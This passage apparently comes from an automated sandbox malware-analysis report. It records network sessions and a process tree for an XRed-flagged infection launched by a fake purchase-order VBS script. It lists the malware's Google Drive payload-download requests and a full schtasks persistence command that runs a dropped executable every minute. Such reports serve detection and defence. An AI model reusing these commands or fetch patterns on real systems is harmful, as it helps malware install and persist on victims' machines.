                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-9-e7Ylxf8K-i9EF-bBnmAw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              147192.168.2.450069142.250.185.2254437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:45 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Host: drive.usercontent.google.com
                                                                                                                              Connection: Keep-Alive
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:45 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                              X-GUploader-UploadID: AFiumC693bBh9WwDgWj5CpmnbixNsZBM-7jxJIPbBHBcQNMuxYL9iFARHFROxx_5Hkvt8cqr1bTSmDY
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:45 GMT
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-CEY6YKjMInzmcTsJYR4nUA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Content-Length: 1652
                                                                                                                              Server: UploadServer
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                                                              Connection: close
                                                                                                                              2024-12-30 10:48:45 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                              2024-12-30 10:48:45 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6f 36 5f 5f 6d 30 46 64 69 48 66 2d 36 63 68 65 65 49 4e 41 36 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="o6__m0FdiHf-6cheeINA6Q">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                              2024-12-30 10:48:45 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              148192.168.2.450079142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-WrZHxJGIO8H_YvcV2Ku3VA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              149192.168.2.450078142.250.185.784437792C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-12-30 10:48:46 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                              User-Agent: Synaptics.exe
                                                                                                                              Host: docs.google.com
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Cookie: NID=520=sCA2n2deEcHgY5b0N-N6JhjIFUwhcS_95WKbYeWzwK1ipsVm25hVA08SJVnyPeswE-gtbA7n9cQ_gfK1BRXtf06cVSkXWP-drdy33p7cxtodGSDghgLzUVRQE-yGeTbhNDAcaFCrKrUZCgtcgA9wLewqSsZcF3qzbKETpyCxoGcarc5cAGIrmI0
                                                                                                                              2024-12-30 10:48:46 UTC1314INHTTP/1.1 303 See Other
                                                                                                                              Content-Type: application/binary
                                                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                              Pragma: no-cache
                                                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                              Date: Mon, 30 Dec 2024 10:48:46 GMT
                                                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-OtpQrqGhb40Z_9tQOVon6A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                              Server: ESF
                                                                                                                              Content-Length: 0
                                                                                                                              X-XSS-Protection: 0
                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Statistics

                                                                                                                              CPU Usage

                                                                                                                              Click to jump to process

                                                                                                                              Memory Usage

                                                                                                                              Click to jump to process

                                                                                                                              High Level Behavior Distribution

                                                                                                                              Click to dive into process behavior distribution

                                                                                                                              Behavior

                                                                                                                              Click to jump to process

                                                                                                                              System Behavior

                                                                                                                              General

                                                                                                                              Target ID:0
                                                                                                                              Start time:05:47:30
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Windows\System32\wscript.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Purchase Order Summary Details.vbs"
                                                                                                                              Imagebase:0x7ff76e130000
                                                                                                                              File size:170'496 bytes
                                                                                                                              MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1766802777.000002235F9C0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1764738724.000002235FCCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1764738724.000002235FCCB000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1766882659.000002235F095000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000003.1765415076.000002235F95C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000003.1765352606.000002235FEB3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:1
                                                                                                                              Start time:05:47:35
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:1'691'136 bytes
                                                                                                                              MD5 hash:1585CB2963DCEB92FBCF6C4C057E191E
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000001.00000000.1765967777.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 92%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:3
                                                                                                                              Start time:05:47:47
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:1'691'136 bytes
                                                                                                                              MD5 hash:1585CB2963DCEB92FBCF6C4C057E191E
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:6
                                                                                                                              Start time:05:47:48
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:1'691'136 bytes
                                                                                                                              MD5 hash:1585CB2963DCEB92FBCF6C4C057E191E
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:Borland Delphi
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:7
                                                                                                                              Start time:05:47:49
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                                                                                                              Imagebase:0xf10000
                                                                                                                              File size:919'552 bytes
                                                                                                                              MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.3025260757.000000000495E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 47%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:10
                                                                                                                              Start time:05:47:49
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:771'584 bytes
                                                                                                                              MD5 hash:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:Borland Delphi
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Avira
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 92%, ReversingLabs
                                                                                                                              Reputation:low
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:11
                                                                                                                              Start time:05:47:50
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                              Imagebase:0xb70000
                                                                                                                              File size:53'161'064 bytes
                                                                                                                              MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:12
                                                                                                                              Start time:05:47:51
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                                                                                                              Imagebase:0x240000
                                                                                                                              File size:236'544 bytes
                                                                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Reputation:high
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:13
                                                                                                                              Start time:05:47:51
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                              Wow64 process (32bit):false
                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                              File size:862'208 bytes
                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:14
                                                                                                                              Start time:05:47:51
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:WSCript C:\Users\user\AppData\Local\Temp\WLJOQW.vbs
                                                                                                                              Imagebase:0x590000
                                                                                                                              File size:147'456 bytes
                                                                                                                              MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Yara matches:
                                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000E.00000002.3016673741.0000000002C92000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000E.00000002.3017946257.0000000003060000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 0000000E.00000002.3016673741.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                              Has exited:false

                                                                                                                              General

                                                                                                                              Target ID:15
                                                                                                                              Start time:05:47:52
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:schtasks /create /tn WLJOQW.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                                                                                                              Imagebase:0xfb0000
                                                                                                                              File size:187'904 bytes
                                                                                                                              MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:16
                                                                                                                              Start time:05:47:54
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:919'552 bytes
                                                                                                                              MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Antivirus matches:
                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                              • Detection: 47%, ReversingLabs
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:19
                                                                                                                              Start time:05:48:01
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:919'552 bytes
                                                                                                                              MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:20
                                                                                                                              Start time:05:48:01
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:919'552 bytes
                                                                                                                              MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:21
                                                                                                                              Start time:05:48:09
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                              Imagebase:0x400000
                                                                                                                              File size:771'584 bytes
                                                                                                                              MD5 hash:84A6CCB0838DA0E05CC6763275C2EE1C
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:Borland Delphi
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:22
                                                                                                                              Start time:05:48:17
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:919'552 bytes
                                                                                                                              MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:23
                                                                                                                              Start time:05:48:25
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\._cache_update.exe"
                                                                                                                              Imagebase:0xf10000
                                                                                                                              File size:919'552 bytes
                                                                                                                              MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:24
                                                                                                                              Start time:05:48:34
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:919'552 bytes
                                                                                                                              MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:28
                                                                                                                              Start time:05:48:58
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7792 -s 4704
                                                                                                                              Imagebase:0xfd0000
                                                                                                                              File size:483'680 bytes
                                                                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                              Has elevated privileges:true
                                                                                                                              Has administrator privileges:true
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:29
                                                                                                                              Start time:05:49:00
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                              Wow64 process (32bit):true
                                                                                                                              Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                              Imagebase:0xd60000
                                                                                                                              File size:919'552 bytes
                                                                                                                              MD5 hash:66A4951D384B55633AB61ADD85514F07
                                                                                                                              Has elevated privileges:false
                                                                                                                              Has administrator privileges:false
                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                              Has exited:true

                                                                                                                              General

                                                                                                                              Target ID:31
                                                                                                                              Start time:05:49:20
                                                                                                                              Start date:30/12/2024
                                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                              Wow64 process (32bit):true
